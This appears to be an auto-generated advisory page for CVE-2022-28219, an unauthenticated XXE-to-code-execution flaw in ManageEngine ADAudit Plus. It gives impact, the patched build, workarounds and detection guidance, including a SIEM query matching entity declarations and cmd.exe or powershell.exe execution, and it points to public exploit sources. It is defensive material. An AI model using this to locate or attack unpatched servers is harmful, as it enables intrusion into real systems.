CVE-2022-28219
📋 TL;DR
CVE-2022-28219 is an unauthenticated XML External Entity (XXE) vulnerability in Cewolf within Zoho ManageEngine ADAudit Plus that allows remote attackers to execute arbitrary code on affected systems. Organizations running ManageEngine ADAudit Plus versions before 7060 are affected. This vulnerability enables complete system compromise without requiring authentication.
💻 Affected Systems
- Zoho ManageEngine ADAudit Plus
📦 What is this software?
⚠️ Risk & Real-World Impact
Worst Case
Full system compromise with administrative privileges, data exfiltration, ransomware deployment, and lateral movement across the network.
Likely Case
Remote code execution leading to installation of backdoors, credential theft, and persistence mechanisms on the affected server.
If Mitigated
Limited impact if proper network segmentation, web application firewalls, and input validation are implemented.
🎯 Exploit Status
Public exploit code available on Packet Storm and other sources. Attack requires no authentication and minimal technical skill.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 7060 and later
Vendor Advisory: https://www.manageengine.com/products/active-directory-audit/cve-2022-28219.html
Restart Required: Yes
Instructions:
1. Download ManageEngine ADAudit Plus build 7060 or later from official vendor site. 2. Backup current installation. 3. Run the installer to upgrade. 4. Restart the ADAudit Plus service.
🔧 Temporary Workarounds
Network Access Control
allRestrict network access to ADAudit Plus web interface using firewall rules
Web Application Firewall
allDeploy WAF with XXE protection rules to block malicious XML payloads
🧯 If You Can't Patch
- Isolate the ADAudit Plus server in a restricted network segment with no internet access
- Implement strict network monitoring and alerting for suspicious XML requests to the ADAudit Plus web interface
🔍 How to Verify
Check if Vulnerable:
Check ADAudit Plus version in web interface admin panel or installation directoryCheck Version:
Check web interface at https://[server]:[port]/api/version or examine installation directory version filesVerify Fix Applied:
Verify version is 7060 or higher and test with XXE payloads to confirm they are blocked📡 Detection & Monitoring
Log Indicators:
- Unusual XML POST requests to ADAudit Plus endpoints
- System command execution logs from ADAudit Plus process
- Outbound connections from ADAudit Plus server to unknown IPs
Network Indicators:
- XML payloads containing external entity references sent to ADAudit Plus ports
- Unexpected outbound connections from ADAudit Plus server
SIEM Query:
source="ADAudit Plus" AND (http_method="POST" AND uri_path="*cewolf*" AND request_body="*<!ENTITY*" OR process_execution="cmd.exe" OR process_execution="powershell.exe")🔗 References
- http://cewolf.sourceforge.net/new/index.html
- http://packetstormsecurity.com/files/167997/ManageEngine-ADAudit-Plus-Path-Traversal-XML-Injection.html
- https://manageengine.com
- https://www.horizon3.ai/red-team-blog-cve-2022-28219/
- https://www.manageengine.com/products/active-directory-audit/cve-2022-28219.html
- http://cewolf.sourceforge.net/new/index.html
- http://packetstormsecurity.com/files/167997/ManageEngine-ADAudit-Plus-Path-Traversal-XML-Injection.html
- https://manageengine.com
- https://www.horizon3.ai/red-team-blog-cve-2022-28219/
- https://www.manageengine.com/products/active-directory-audit/cve-2022-28219.html
